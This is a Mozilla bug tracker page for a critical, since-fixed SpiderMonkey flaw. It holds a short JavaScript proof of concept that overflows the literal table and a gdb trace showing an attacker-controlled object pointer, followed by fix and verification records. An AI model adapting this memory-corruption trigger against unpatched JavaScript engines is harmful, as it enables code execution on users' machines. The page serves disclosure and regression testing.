Closed Bug 364023 Opened 18 years ago Closed 18 years ago

LITOPX DEFFUN is exploitable

Categories

(Core :: JavaScript Engine, defect)

Product:
Core
Component:
JavaScript Engine
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: sync2d, Assigned: sync2d)

Details

(Keywords: crash, verified1.8.0.10, verified1.8.1.2, Whiteboard: [sg:critical] security tracker for bug 363988)

Attachments

(1 file)

js1_5/Function/regress-364023.js
2.55 KB, text/plain
Details 
$ cat litopx-deffun-x.txt
function exploit() {
  var code = "";
  for(var i = 0; i < 0x10000; i++) {
    if(i == 125) {
      code += "void 0x10000050505050;\n";
    } else {
      code += "void " + (0x10000000000000 + i) + ";\n";
    }
  }
  code += "function foo() {}\n";
  eval(code);
}
exploit();

$ gdb --eval run --args dbg.obj/js litopx-deffun-x.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x00432d3d in JS_GetPrivate (cx=0xb50750, obj=0x131c620) at jsapi.c:2298
2298        JS_ASSERT(OBJ_GET_CLASS(cx, obj)->flags & JSCLASS_HAS_PRIVATE);
(gdb) print *obj
$1 = {map = 0x50505050, fslots = {1127219200, 126, 1127219200, 127,
    1127219200, 128}, dslots = 0x43300000}

In other words, bug 363988 is exploitable.
Flags: blocking1.8.1.2+
Flags: blocking1.8.0.10+
Whiteboard: [sg:critical] security tracker for bug 363988
shutdown contributed a patch for bug 363988
Assignee: general → shutdown
Fix landed for bug 363988.

/be
Status: NEW → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
Flags: in-testsuite+
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Status: RESOLVED → VERIFIED
Group: security
/cvsroot/mozilla/js/tests/js1_5/Function/regress-364023.js,v  <--  regress-364023.js
initial revision: 1.1
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: